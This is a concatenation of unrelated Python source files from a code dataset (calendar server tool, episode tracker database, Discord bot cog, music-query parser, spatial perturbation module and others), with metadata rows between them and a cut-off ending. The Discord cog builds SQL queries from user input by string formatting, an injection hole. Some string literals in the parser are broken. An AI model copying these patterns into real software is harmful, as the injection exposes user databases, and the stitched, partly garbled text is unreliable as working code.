# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
from __future__ import print_function
from calendarserver.tools.cmdline import utilityMain, WorkerService
from argparse import ArgumentParser
from twext.python.log import Logger
from twisted.internet.defer import inlineCallbacks
from twext.who.idirectory import RecordType
import time
log = Logger()
class DisplayAPNSubscriptions(WorkerService):

    users = []

    def doWork(self):
        rootResource = self.rootResource()
        directory = rootResource.getDirectory()
        return displayAPNSubscriptions(self.store, directory, rootResource,
                                       self.users)


def main():
    parser = ArgumentParser(description='Display Apple Push Notification subscriptions')
    parser.add_argument('-f', '--config', dest='configFileName', metavar='CONFIGFILE', help='caldavd.plist configuration file path')
    parser.add_argument('-d', '--debug', action='store_true', help='show debug logging')
    parser.add_argument('user', help='one or more users to display', nargs='+')  # Required
    args = parser.parse_args()

    DisplayAPNSubscriptions.users = args.user

    utilityMain(
        args.configFileName,
        DisplayAPNSubscriptions,
        verbose=args.debug,
    )


@inlineCallbacks
def displayAPNSubscriptions(store, directory, root, users):
    for user in users:
        print()
        record = yield directory.recordWithShortName(RecordType.user, user)
        if record is not None:
            print("User %s (%s)..." % (user, record.uid))
            txn = store.newTransaction(label="Display APN Subscriptions")
            subscriptions = (yield txn.apnSubscriptionsBySubscriber(record.uid))
            (yield txn.commit())
            if subscriptions:
                byKey = {}
                for token, key, timestamp, userAgent, ipAddr in subscriptions:
                    byKey.setdefault(key, []).append((token, timestamp, userAgent, ipAddr))
                for key, tokens in byKey.iteritems():
                    print()
                    protocol, _ignore_host, path = key.strip("/").split("/", 2)
                    resource = {
                        "CalDAV": "calendar",
                        "CardDAV": "addressbook",
                    }[protocol]
                    if "/" in path:
                        uid, collection = path.split("/")
                    else:
                        uid = path
                        collection = None
                    record = yield directory.recordWithUID(uid)
                    user = record.shortNames[0]
                    if collection:
                        print("...is subscribed to a share from %s's %s home" % (user, resource),)
                    else:
                        print("...is subscribed to %s's %s home" % (user, resource),)
                    # print(" (key: %s)\n" % (key,))
                    print("with %d device(s):" % (len(tokens),))
                    for token, timestamp, userAgent, ipAddr in tokens:
                        print(" %s\n '%s' from %s\n %s" % (
                            token, userAgent, ipAddr,
                            time.strftime(
                                "on %a, %d %b %Y at %H:%M:%S %z(%Z)",
                                time.localtime(timestamp)
                            )
                        ))
            else:
                print(" ...is not subscribed to anything.")
        else:
            print("User %s not found" % (user,))
frigg/frigg-common | frigg/projects.py | 1 | 1163 | # -*- coding: utf8 -*-
import logging
from os import listdir
from os.path import exists, isfile, join
import yaml
from .helpers import detect_test_runners
logger = logging.getLogger(__name__)
def build_tasks(directory):
    try:
        files = [f for f in listdir(directory) if isfile(join(directory, f))]
    except OSError as e:
        files = []
        logger.error('Could not read files in path {}: \n {}'.format(directory, e))
    return detect_test_runners(files)


def load_settings_file(path):
    with open(path) as f:
        return yaml.load(f)


def get_path_of_settings_file(directory):
    if exists(join(directory, '.frigg.yml')):
        return join(directory, '.frigg.yml')
    elif exists(join(directory, '.frigg.yaml')):
        return join(directory, '.frigg.yaml')


def build_settings(directory):
    path = get_path_of_settings_file(directory)

    settings = {
        'webhooks': [],
    }

    if path is not None:
        settings.update(load_settings_file(path))
    else:
        settings['tasks'] = build_tasks(directory)

    if len(settings['tasks']) == 0:
        raise RuntimeError('No tasks found')

    return settings
| mit | 6,964,887,796,134,280,000 | 22.734694 | 83 | 0.638865 | false |
jethrogb/episoder | pyepisoder/episoder.py | 1 | 6798 | # episoder, https://code.ott.net/episoder
#
# Copyright (C) 2004-2020 Stefan Ott. All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
import logging
from datetime import date, timedelta
import sqlite3
from sqlalchemy import Table, MetaData, create_engine, or_, and_
from sqlalchemy.orm import create_session
from .database import Episode, Show, Meta
class Database(object):

    def __init__(self, path):
        self._path = path
        self.logger = logging.getLogger("Database")
        self.open()
        self._initdb()

    def __str__(self):
        return "Episoder Database at %s" % self._path

    def __repr__(self):
        return "Database(%s)" % self._path

    def _initdb(self):
        # Initialize the database if all tables are missing
        tables = [Show, Episode, Meta]
        tables = map(lambda x: x.__table__.exists, tables)
        found = [x for x in tables if x(bind=self.engine)]

        if len(found) < 1:
            Show.__table__.create(bind=self.engine)
            Episode.__table__.create(bind=self.engine)
            Meta.__table__.create(bind=self.engine)
            self.set_schema_version(4)

    def open(self):
        if self._path.find("://") > -1:
            self.engine = create_engine(self._path,
                                        convert_unicode=True)
        else:
            self.engine = create_engine("sqlite:///%s" % self._path)

        self.conn = self.engine.connect()
        self.metadata = MetaData()
        self.metadata.bind = self.engine
        self.session = create_session(bind=self.engine)
        self.session.begin()

    def close(self):
        self.session.commit()
        self.session.close()
        self.conn.close()
        self.engine.dispose()

    def set_schema_version(self, version):
        meta = Meta()
        meta.key = "schema"
        meta.value = "%d" % version
        self.session.merge(meta)
        self.session.flush()

    def get_schema_version(self):
        if not Meta.__table__.exists(bind=self.engine):
            return 1

        res = self.session.query(Meta).get("schema")
        if res:
            return int(res.value)

        return 0

    def clear(self):
        episodes = self.session.query(Episode).all()

        for episode in episodes:
            self.session.delete(episode)

        self.session.flush()
    def migrate(self):
        schema_version = self.get_schema_version()
        self.logger.debug("Found schema version %s", schema_version)

        if schema_version < 0:
            self.logger.debug("Automatic schema updates disabled")
            return

        if schema_version == 1:
            # Upgrades from version 1 are rather harsh, we
            # simply drop and re-create the tables
            self.logger.debug("Upgrading to schema version 2")

            table = Table("episodes", self.metadata, autoload=True)
            table.drop()

            table = Table("shows", self.metadata, autoload=True)
            table.drop()

            Show.__table__.create(bind=self.engine)
            Episode.__table__.create(bind=self.engine)
            Meta.__table__.create(bind=self.engine)

            schema_version = 4
            self.set_schema_version(schema_version)

        if schema_version == 2:
            # Add two new columns to the shows table
            self.logger.debug("Upgrading to schema version 3")

            # We can only do this with sqlite databases
            assert self.engine.driver == "pysqlite"

            self.close()

            upgrade = sqlite3.connect(self._path)
            upgrade.execute("ALTER TABLE shows "
                            "ADD COLUMN enabled TYPE boolean")
            upgrade.execute("ALTER TABLE shows "
                            "ADD COLUMN status TYPE integer")
            upgrade.close()

            self.open()
            schema_version = 3
            self.set_schema_version(schema_version)

        if schema_version == 3:
            # Add a new column to the episodes table
            self.logger.debug("Upgrading to schema version 4")

            # We can only do this with sqlite databases
            assert self.engine.driver == "pysqlite"

            self.close()

            upgrade = sqlite3.connect(self._path)
            upgrade.execute("ALTER TABLE episodes "
                            "ADD COLUMN notified TYPE date")
            upgrade.close()

            self.open()
            schema_version = 4
            self.set_schema_version(schema_version)
    def get_expired_shows(self, today=date.today()):
        delta_running = timedelta(2)    # 2 days
        delta_suspended = timedelta(7)  # 1 week
        delta_ended = timedelta(14)     # 2 weeks

        shows = self.session.query(Show).filter(or_(
            and_(
                Show.enabled,
                Show.status == Show.RUNNING,
                Show.updated < today - delta_running
            ),
            and_(
                Show.enabled,
                Show.status == Show.SUSPENDED,
                Show.updated < today - delta_suspended
            ),
            and_(
                Show.enabled,
                Show.status == Show.ENDED,
                Show.updated < today - delta_ended
            )
        ))

        return shows.all()

    def get_enabled_shows(self):
        shows = self.session.query(Show).filter(Show.enabled)
        return shows.all()

    def get_show_by_url(self, url):
        shows = self.session.query(Show).filter(Show.url == url)

        if shows.count() < 1:
            return None

        return shows.first()

    def get_show_by_id(self, show_id):
        return self.session.query(Show).get(show_id)

    def add_show(self, show):
        show = self.session.merge(show)
        self.session.flush()
        return show

    def remove_show(self, show_id):
        show = self.session.query(Show).get(show_id)

        if not show:
            self.logger.error("No such show")
            return

        episodes = self.session.query(Episode)

        for episode in episodes.filter(Episode.show_id == show.id):
            self.session.delete(episode)

        self.session.delete(show)
        self.session.flush()

    def get_shows(self):
        return self.session.query(Show).all()

    def add_episode(self, episode, show):
        episode.show_id = show.id
        self.session.merge(episode)
        self.session.flush()

    def get_episodes(self, basedate=date.today(), n_days=0):
        enddate = basedate + timedelta(n_days)

        return self.session.query(Episode).\
            filter(Episode.airdate >= basedate). \
            filter(Episode.airdate <= enddate). \
            order_by(Episode.airdate).all()

    def search(self, search):
        return self.session.query(Episode).\
            filter(or_(
                Episode.title.like("%%%s%%" % search),
                Show.name.like("%%%s%%" % search))). \
            order_by(Episode.airdate).all()

    def commit(self):
        self.session.commit()
        self.session.begin()

    def rollback(self):
        self.session.rollback()
        self.session.begin()

    def remove_before(self, then, show=None):
        eps = self.session.query(Episode).filter(Episode.airdate < then)

        if show:
            eps = eps.filter(Episode.show == show)

        for episode in eps:
            self.session.delete(episode)

        self.commit()
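
# A minimal usage sketch (hypothetical database path): open a database,
# run schema migrations, and list the next week of episodes.
#
#     db = Database("/tmp/episoder.db")
#     db.migrate()
#     for episode in db.get_episodes(n_days=7):
#         print(episode)
#     db.close()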
| gpl-3.0 | -8,041,760,182,362,835,000 | 22.201365 | 71 | 0.682848 | false |
stepuncius/vk_mutual_friends_finder | vk_mutual_friends_finder/get_names_of_users.py | 1 | 1027 | import pyvkontakte
from collections import namedtuple
def get_names_of_users(set_of_users):
    """Takes a set of user ids and returns namedtuples
    with their names, last names and a link to their pages.

    Caution: it can't work with more than 1000 people;
    that is a limitation of the vk api.
    """
    VK_ADRESS = "https://vk.com/id"
    assert type(set_of_users) == set, "Not set given"
    if len(set_of_users) > 1000:
        print("only the first thousand of users will be shown.")
    api = pyvkontakte.VkontakteApi()
    string_of_ids = ",".join(map(str, set_of_users))
    response = api.call("users.get", user_ids=string_of_ids, v='5.8')
    user = namedtuple(
        'user', ['adress', 'first_name', 'last_name', 'id'])
    result = [user(adress=VK_ADRESS + str(usr['id']),
                   id=usr['id'],
                   first_name=usr['first_name'],
                   last_name=usr['last_name'])
              for usr in response]
    return result


if __name__ == "__main__":
    print(get_names_of_users(set((1, 3, 6))))
motmot/flytrax | motmot/flytrax/trax_udp_sender.py | 1 | 4075 | import pkg_resources
import socket, threading
import wx
from wx import xrc
RESFILE = pkg_resources.resource_filename(__name__,"trax_udp_sender.xrc") # trigger extraction
RES = xrc.EmptyXmlResource()
RES.LoadFromString(open(RESFILE).read())
class UDPSender(object):
    """A base class for keeping track of a list of UDP receiver hostnames

    Use this class in the following way to get a list of hostnames to send data to:

    hosts = udp_sender_instance.get_downstream_hosts()
    for host in hosts:
        sockobj.sendto( 'hello', host)

    """
    def __init__(self, frame):
        self.frame = frame

        self._remote_host_lock = threading.Lock()
        self._remote_host_changed = threading.Event()
        self._remote_host_caller = []
        self._remote_host_gui = []

        self.edit_udp_receivers_dlg = RES.LoadDialog(self.frame, "UDP_RECEIVER_DIALOG")

        #####################

        ctrl = xrc.XRCCTRL(self.edit_udp_receivers_dlg, "UDP_ADD")
        ctrl.Bind(wx.EVT_BUTTON, self.OnUDPAdd)

        ctrl = xrc.XRCCTRL(self.edit_udp_receivers_dlg, "UDP_EDIT")
        wx.EVT_BUTTON(ctrl, ctrl.GetId(), self.OnUDPEdit)

        ctrl = xrc.XRCCTRL(self.edit_udp_receivers_dlg, "UDP_REMOVE")
        wx.EVT_BUTTON(ctrl, ctrl.GetId(), self.OnUDPRemove)

        #######################

    def get_downstream_hosts(self):
        if self._remote_host_changed.isSet():
            self._remote_host_lock.acquire()
            try:
                # copy items out of list shared across threads
                self._remote_host_caller = self._remote_host_gui
                self._remote_host_changed.clear()
            finally:
                self._remote_host_lock.release()
        return self._remote_host_caller

    def OnEditUDPReceivers(self, event):
        self.edit_udp_receivers_dlg.ShowModal()

    def remote_hosts_changed(self):
        listctrl = xrc.XRCCTRL(self.edit_udp_receivers_dlg, "UDP_RECEIVER_LIST")
        n = listctrl.GetCount()
        self._remote_host_lock.acquire()
        try:
            self._remote_host_changed.set()
            self._remote_host_gui = []
            for idx in range(n):
                self._remote_host_gui.append(listctrl.GetClientData(idx))
        finally:
            self._remote_host_lock.release()

    def OnEnableSendToIP(self, event):
        widget = event.GetEventObject()
        if widget.IsChecked():
            self.send_over_ip.set()
        else:
            self.send_over_ip.clear()

    def OnUDPAdd(self, event):
        listctrl = xrc.XRCCTRL(self.edit_udp_receivers_dlg, "UDP_RECEIVER_LIST")
        dlg = wx.TextEntryDialog(self.wx_parent,
                                 'Please add the hostname',
                                 )
        try:
            if dlg.ShowModal() == wx.ID_OK:
                hostname = dlg.GetValue()
                try:
                    ip = socket.gethostbyname(hostname)
                except socket.gaierror, x:
                    dlg2 = wx.MessageDialog(dlg,
                                            'error getting IP address: ' + str(x),
                                            'FlyTrax: socket error',
                                            wx.OK | wx.ICON_ERROR)
                    dlg2.ShowModal()
                    dlg2.Destroy()
                else:
                    remote_host = (ip, 28931)
                    if hostname != '':
                        toshow = hostname
                    else:
                        toshow = str(ip)
                    idx = listctrl.Append(toshow)
                    listctrl.SetClientData(idx, remote_host)
                    self.remote_hosts_changed()
        finally:
            dlg.Destroy()

    def OnUDPEdit(self, event):
        widget = event.GetEventObject()

    def OnUDPRemove(self, event):
        listctrl = xrc.XRCCTRL(self.edit_udp_receivers_dlg, "UDP_RECEIVER_LIST")
        idx = listctrl.GetSelection()
        if idx == wx.NOT_FOUND:
            return
        remote_host = listctrl.GetClientData(idx)
        listctrl.Delete(idx)
        self.remote_hosts_changed()
| bsd-3-clause | -2,490,107,922,923,382,000 | 33.533898 | 94 | 0.547485 | false |
mmclenna/engine | sky/build/template.py | 1 | 1665 | #!/usr/bin/env python
#
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''Renders a single template file using the Jinga templating engine.'''
import argparse
import sys
import os
import itertools
sys.path.append(os.path.join(os.path.dirname(__file__), '../../third_party'))
import jinja2
from jinja2 import Environment, FileSystemLoader
def make_stamp_file(stamp_path):
    dir_name = os.path.dirname(stamp_path)
    with open(stamp_path, 'a'):
        os.utime(stamp_path, None)


def main():
    parser = argparse.ArgumentParser(description=__doc__)
    parser.add_argument('--template', help='The template file to render')
    parser.add_argument('--stamp', help='The template stamp file')
    parser.add_argument('--output',
                        help='The output file to render the template to')
    parser.add_argument('vars', metavar='V', nargs='+',
                        help='A list of key value pairs used as template args')
    args = parser.parse_args()

    template_file = os.path.abspath(args.template)
    if not os.path.isfile(template_file):
        print 'Cannot find file at path: ', template_file
        return 1

    env = jinja2.Environment(loader=FileSystemLoader('/'),
                             undefined=jinja2.StrictUndefined)
    template = env.get_template(template_file)
    variables = dict(itertools.izip_longest(*[iter(args.vars)] * 2, fillvalue=''))
    output = template.render(variables)

    with open(os.path.abspath(args.output), 'wb') as file:
        file.write(output)
    make_stamp_file(args.stamp)


if __name__ == '__main__':
    main()
| bsd-3-clause | 4,045,351,747,393,844,700 | 27.220339 | 80 | 0.679279 | false |
pyfa-org/eos | eos/eve_obj/effect/dmg_dealer/fighter/missiles.py | 1 | 1879 | # ==============================================================================
# Copyright (C) 2011 Diego Duclos
# Copyright (C) 2011-2018 Anton Vorobyov
#
# This file is part of Eos.
#
# Eos is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Eos is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Eos. If not, see <http://www.gnu.org/licenses/>.
# ==============================================================================
from eos.const.eve import AttrId
from eos.eve_obj.effect.dmg_dealer.base import DmgDealerEffect
from eos.eve_obj.effect.fighter_effect import FighterEffect
from eos.stats_container import DmgStats
class FighterAbilityMissiles(DmgDealerEffect, FighterEffect):

    def get_volley(self, item):
        if not self.get_cycles_until_reload(item):
            return DmgStats(0, 0, 0, 0)
        em = item.attrs.get(AttrId.fighter_ability_missiles_dmg_em, 0)
        therm = item.attrs.get(AttrId.fighter_ability_missiles_dmg_therm, 0)
        kin = item.attrs.get(AttrId.fighter_ability_missiles_dmg_kin, 0)
        expl = item.attrs.get(AttrId.fighter_ability_missiles_dmg_expl, 0)
        dmg_mult = item.attrs.get(AttrId.fighter_ability_missiles_dmg_mult, 1)
        squad_size = self.get_squad_size(item)
        mult = dmg_mult * squad_size
        return DmgStats(em, therm, kin, expl, mult)

    def get_applied_volley(self, item, tgt_data):
        raise NotImplementedError
| lgpl-3.0 | -1,862,110,855,468,433,400 | 42.697674 | 80 | 0.662586 | false |
aaiijmrtt/MUSICALQA | code/language.py | 1 | 3650 | import pyparsing
literals = lambda literallist: pyparsing.Or([pyparsing.Literal(literal) for literal in literallist])
times = literals(['breve', 'breves', 'semibreve','semibreves', 'minim', 'minims', 'crotchets', 'crotchet', 'quavers', 'quaver', 'semiquaver','semiquavers', 'demisemiquaver', 'demisemiquavers'])
augmentedtimes = literals(['dotted', 'double dotted'])
notes = literals(['B', 'C', 'D', 'E', 'F', 'G', 'Do', 'Re', 'Mi', 'Fa', 'Sol', 'La', 'Ti', 'do', 're', 'mi', 'fa', 'sol', 'la', 'ti'])
augmentednotes = literals(['#', 'b'])
octave = literals(['1', '2', '3', '4', '5', '6', '7'])
instruments = literals(['flute', 'oboe', 'violin', 'violin I', 'violin II', 'timpani', 'double basses', 'cello', 'bass', 'horn', 'piano', 'harpsichord'])
hands = literals(['right', 'left'])
conjunction = literals(['against', 'followed by'])
clef = literals(['bass', 'treble'])
alphanumerals = literals(['one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine', 'ten', 'eleven', 'twelve'])
passage = literals(['homophonic', 'monophonic', 'polyphonic'])
query = pyparsing.And([
pyparsing.Group(
pyparsing.Optional(
pyparsing.Or([
alphanumerals,
pyparsing.OneOrMore(pyparsing.Word(pyparsing.nums))
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.Or([
pyparsing.Literal('chord'),
pyparsing.Literal('melody')
])
)
),
pyparsing.Group(
pyparsing.ZeroOrMore(
pyparsing.And([
pyparsing.Group(pyparsing.Optional(augmentedtimes)),
times
])
)
),
pyparsing.Group(
pyparsing.ZeroOrMore(
pyparsing.And([
notes,
pyparsing.Group(pyparsing.Optional(augmentednotes)),
pyparsing.Group(pyparsing.Optional(octave))
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.Or([
pyparsing.Literal('rest'),
pyparsing.Literal('notes'),
pyparsing.Literal('note'),
pyparsing.Literal('melody')
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.And([
alphanumerals,
pyparsing.Or([
pyparsing.Literal('note'),
pyparsing.Literal('notes')
]),
pyparsing.Literal('melody')
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.And([
pyparsing.Literal("on the word ""),
pyparsing.ZeroOrMore(pyparsing.Word(pyparsing.alphas)),
pyparsing.Literal("!"")
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.And([
passage,
pyparsing.Literal('passage')
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.And([
pyparsing.Or([
pyparsing.Literal('in bars'),
pyparsing.Literal('in measures')
]),
pyparsing.OneOrMore(pyparsing.Word(pyparsing.nums)),
pyparsing.Or([
pyparsing.Literal('-'),
pyparsing.Literal('to')
]),
pyparsing.OneOrMore(pyparsing.Word(pyparsing.nums))
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.And([
pyparsing.Literal('in'),
pyparsing.OneOrMore(pyparsing.Word(pyparsing.nums)),
pyparsing.Literal('/'),
pyparsing.OneOrMore(pyparsing.Word(pyparsing.nums)),
pyparsing.Literal('time')
]),
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.And([
pyparsing.Literal('in the'),
clef,
pyparsing.Literal('clef')
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.And([
pyparsing.Literal('in the'),
instruments
])
)
)
])
compound = pyparsing.And([
query,
pyparsing.ZeroOrMore(
pyparsing.And([
conjunction,
query
])
)
])
def parse(question):
return query.parseString(question).asList()
if __name__ == '__main__':
print parse('dotted crotchet G6')
| mit | -770,983,344,402,978,700 | 22.101266 | 193 | 0.629041 | false |
doshaq/Doshabot | cogs/game.py | 1 | 1090 | from discord.ext import commands
import sqlite3
class game :
conn = sqlite3.connect('bot_game.db')
c = conn.cursor()
def __init__(self, bot):
self.bot = bot
conn = sqlite3.connect('bot_game.db')
c = conn.cursor()
@commands.command(pass_context=True, no_pm=True)
async def join_game(self, ctx, *keywords):
self.c.execute("INSERT INTO players VALUES('{}','{}','{}','talking_island',1,NULL,'false')".format(str(ctx.message.author),keywords[0],keywords[1]))
self.conn.commit()
		await self.bot.say("You have been added to the game")
@commands.command(pass_context=True,no_pm=True)
async def login(self,ctx):
self.c.execute("UPDATE players SET connect='true' WHERE username ='{}'".format(str(ctx.message.author)))
self.conn.commit()
		await self.bot.say("Connected")
@commands.command(pass_context=True,no_pm=True)
async def logout(self,ctx):
self.c.execute("UPDATE players SET connect='false' WHERE username ='{}'".format(str(ctx.message.author)))
self.conn.commit()
		await self.bot.say("Disconnected")
def setup(bot):
bot.add_cog(game(bot)) | gpl-3.0 | 7,310,226,834,112,171,000 | 39.653846 | 150 | 0.700758 | false |
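# Note (reviewer suggestion, not original code): the string-formatted SQL above
# is vulnerable to injection; sqlite3 supports parameter binding instead, e.g.
#   c.execute("UPDATE players SET connect='false' WHERE username = ?",
#             (str(ctx.message.author),))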
tgquintela/pySpatialTools | pySpatialTools/utils/perturbations/perturbations.py | 1 | 23997 |
"""
Perturbations
-------------
Module oriented to perform a perturbation of the system in order to carry out
with statistical testing of models.
The main function of this module is grouping functions which are able to
change the system to other statistically probable options in order to explore
the sample space.
TODO
----
-Aggregation perturbation:
--- Discretization perturbed.
--- Fluctuation of features between borders.
- Fluctuation of borders
--- Fluctuation of edge points
--- Fluctuation over sampling points
"""
import numpy as np
###############################################################################
############################ Location perturbation ############################
###############################################################################
class BasePerturbation:
"""General perturbation. It constains default functions for perturbation
objects.
"""
def _initialization(self):
self.locations_p = None
self.features_p = None
self.relations_p = None
self.discretizations_p = None
self.k_perturb = 1
## Ensure correctness
self.assert_correctness()
def assert_correctness(self):
"""Assert the correct Perturbation class."""
assert('_categorytype' in dir(self))
assert('_perturbtype' in dir(self))
def apply2indice(self, i, k):
"""Apply the transformation to the indices.
Parameters
----------
i: int, list or np.ndarray
the indices of the elements `i`.
k: int, list
the perturbation indices.
Returns
-------
i: int, list or np.ndarray
the indices of the elements `i`.
"""
return i
################## Transformations of the main elements ###################
def apply2locs(self, locations):
"""Apply perturbation to locations.
Parameters
----------
locations: np.ndarray or others
the spatial information to be perturbed.
Returns
-------
locations: np.ndarray or others
the spatial information perturbated.
"""
return locations
def apply2features(self, features):
"""Apply perturbation to features.
Parameters
----------
features: np.ndarray or others
the element features collection to be perturbed.
Returns
-------
features: np.ndarray or others
the element features collection perturbated.
"""
return features
def apply2relations(self, relations):
"""Apply perturbation to relations.
Parameters
----------
relations: np.ndarray or others
the relations between elements to be perturbated.
Returns
-------
relations: np.ndarray or others
the relations between elements perturbated.
"""
return relations
def apply2discretizations(self, discretization):
"""Apply perturbation to discretization.
Parameters
----------
discretization: np.ndarray or others
the discretization perturbation.
Returns
-------
discretization: np.ndarray or others
the discretization perturbation.
"""
return discretization
######################### Precomputed applications ########################
def apply2features_ind(self, features, i, k):
"""Apply perturbation to features individually for precomputed
applications.
Parameters
----------
features: np.ndarray or others
the element features to be perturbed.
i: int or list
the element indices.
k: int or list
the perturbation indices.
Returns
-------
locations: np.ndarray or others
the element features perturbated.
"""
return self.features_p[i, :, k]
def apply2locs_ind(self, locations, i, k):
"""Apply perturbation to locations individually for precomputed
applications.
Parameters
----------
locations: np.ndarray or others
the spatial information to be perturbed.
i: int or list
the element indices.
k: int or list
the perturbation indices.
Returns
-------
locations: np.ndarray or others
the spatial information perturbated.
"""
return self.locations_p[i, :, k]
def apply2relations_ind(self, relations, i, k):
"""For precomputed applications. Apply perturbation to relations.
Parameters
----------
relations: np.ndarray or others
the relations between elements to be perturbated.
Returns
-------
relations: np.ndarray or others
the relations between elements perturbated.
"""
return self.relations_p[i, :, k]
##################### Selfcomputation of main elements ####################
def selfcompute_features(self, features):
pass
def selfcompute_locations(self, locations):
pass
def selfcompute_relations(self, relations):
pass
def selfcompute_discretizations(self, discretizations):
pass
################################# Examples ################################
# def selfcompute_locations(self, locations):
# self.locations_p = self.apply2locs(locations)
#
# def selfcompute_features(self, features):
# self.features_p = self.apply2features(features)
###############################################################################
############################## None perturbation ##############################
###############################################################################
class NonePerturbation(BasePerturbation):
"""None perturbation. Default perturbation which not alters the system."""
_categorytype = "general"
_perturbtype = "none"
def __init__(self, k_perturb=1):
"""The none perturbation, null perturbation where anything happens.
Parameters
----------
k_perturb: int (default=1)
the number of perturbations applied.
"""
self._initialization()
self.k_perturb = k_perturb
###############################################################################
############################ Location perturbation ############################
###############################################################################
class JitterLocations(BasePerturbation):
"""Jitter module to perturbe locations of the system in order of testing
methods.
    TODO: Fit some model for inferring stds.
"""
_categorytype = "location"
_perturbtype = "jitter_coordinate"
def __init__(self, stds=0, k_perturb=1):
"""The jitter locations apply to locations a jittering perturbation.
Parameters
----------
k_perturb: int (default=1)
the number of perturbations applied.
"""
self._initialization()
self._stds = np.array(stds)
self.k_perturb = k_perturb
def apply2locs(self, locations, k=None):
"""Apply perturbation to locations.
Parameters
----------
locations: np.ndarray
the spatial information to be perturbed.
k: int (default=None)
the perturbation indices.
Returns
-------
locations: np.ndarray
the spatial information perturbated.
"""
## Preparation of ks
ks = range(self.k_perturb) if k is None else k
ks = [k] if type(k) == int else ks
locations_p = np.zeros((len(locations), locations.shape[1], len(ks)))
for ik in range(len(ks)):
jitter_d = np.random.random(locations.shape)
locations_pj = np.multiply(self._stds, jitter_d) + locations
locations_p[:, :, ik] = locations_pj
return locations_p
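# Illustrative usage (assumption, not part of the original module):
#   locs = np.random.random((100, 2))
#   pert = JitterLocations(stds=np.array([0.01, 0.01]), k_perturb=5)
#   locs_p = pert.apply2locs(locs)  # shape (100, 2, 5)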
class PermutationPerturbationLocations(BasePerturbation):
"""Reindice perturbation for the whole locations."""
_categorytype = "location"
_perturbtype = "element_permutation"
def __init__(self, reindices):
"""Perturbations by permuting locations.
Parameters
----------
reindices: np.ndarray
the reindices to apply permutation perturbations.
"""
self._initialization()
self._format_reindices(reindices)
def _format_reindices(self, reindices):
"""Format reindices.
Parameters
----------
reindices: np.ndarray or tuple
the reindices to apply permutation perturbations.
"""
if type(reindices) == np.ndarray:
self.k_perturb = reindices.shape[1]
self.reindices = reindices
elif type(reindices) == tuple:
n, k_perturb = reindices
if type(n) == int and type(k_perturb) == int:
self.k_perturb = k_perturb
self.reindices = np.vstack([np.random.permutation(n)
for i in xrange(k_perturb)]).T
def apply2locs(self, locations, k=None):
"""Apply perturbation to locations.
Parameters
----------
locations: np.ndarray
the spatial information to be perturbed.
k: int (default=None)
the perturbation indices.
Returns
-------
locations: np.ndarray
the spatial information perturbated.
"""
## Preparation of ks
ks = range(self.k_perturb) if k is None else k
ks = [k] if type(k) == int else ks
##Be coherent with the input location types
ndim = 1 if '__len__' not in dir(locations[0]) else len(locations[0])
if type(locations) == np.ndarray:
locations_p = np.zeros((len(locations), ndim, len(ks)))
for ik in range(len(ks)):
locations_p[:, :, ik] = locations[self.reindices[:, ks[ik]]]
else:
locations_p = [[[]]*len(locations)]*len(ks)
for ik in range(len(ks)):
for i in range(len(locations)):
locations_p[ik][i] = locations[self.reindices[i, ks[ik]]]
return locations_p
def apply2indice(self, i, k):
"""Apply the transformation to the indices.
Parameters
----------
i: int, list or np.ndarray
the indices of the elements `i`.
k: int, list
the perturbation indices.
Returns
-------
i: int, list or np.ndarray
the indices of the elements `i`.
"""
return self.reindices[i, k]
###############################################################################
########################### Permutation perturbation ##########################
###############################################################################
class PermutationPerturbation(BasePerturbation):
"""Reindice perturbation for the whole features variables."""
_categorytype = "feature"
_perturbtype = "element_permutation"
def __init__(self, reindices):
"""Element perturbation for all permutation perturbation.
Parameters
----------
reindices: np.ndarray or tuple
the reindices to apply permutation perturbations.
"""
self._initialization()
self._format_reindices(reindices)
def _format_reindices(self, reindices):
"""Format reindices for permutation reindices.
Parameters
----------
reindices: np.ndarray or tuple
the reindices to apply permutation perturbations.
"""
if type(reindices) == np.ndarray:
self.k_perturb = reindices.shape[1]
self.reindices = reindices
elif type(reindices) == tuple:
n, k_perturb = reindices
if type(n) == int and type(k_perturb) == int:
self.k_perturb = k_perturb
self.reindices = np.vstack([np.random.permutation(n)
for i in xrange(k_perturb)]).T
def apply2features(self, features, k=None):
"""Apply perturbation to features.
Parameters
----------
features: np.ndarray or others
the element features collection to be perturbed.
k: int (default=None)
the perturbation indices.
Returns
-------
features: np.ndarray or others
the element features collection perturbated.
"""
## Assert good features
assert len(features) == len(self.reindices)
## Prepare ks
ks = range(self.k_perturb) if k is None else k
ks = [k] if type(k) == int else ks
## Computation of new prturbated features
sh = len(features), features.shape[1], len(ks)
features_p = np.zeros(sh)
for ik in range(len(ks)):
features_p[:, :, ik] = features[self.reindices[:, ks[ik]], :]
return features_p
def apply2features_ind(self, features, i, k):
"""Apply perturbation to features individually for precomputed
applications.
Parameters
----------
features: np.ndarray or others
the element features to be perturbed.
i: int or list
the element indices.
k: int or list
the perturbation indices.
Returns
-------
locations: np.ndarray or others
the element features perturbated.
"""
return features[self.reindices[i, k]]
def apply2indice(self, i, k):
